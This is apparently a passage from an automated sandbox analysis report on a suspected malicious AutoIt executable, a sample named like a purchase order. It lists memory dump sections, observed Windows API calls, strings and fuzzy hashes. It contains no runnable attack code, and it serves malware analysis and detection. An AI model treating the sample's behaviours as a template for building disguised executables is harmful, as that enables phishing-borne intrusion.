                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 1988441806-3962188686
                                                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: u,D
                                                                  • API String ID: 4104443479-3858472334
                                                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • wsprintfW.USER32 ref: 0045612A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_mallocwsprintf
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 1262938277-328681919
                                                                  • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                  • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                  • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                  • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                  APIs
                                                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                                                  • InternetCloseHandle.WININET ref: 00442668
                                                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                                                  • String ID: aeB
                                                                  • API String ID: 857135153-906807131
                                                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                  • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                  • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                  • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D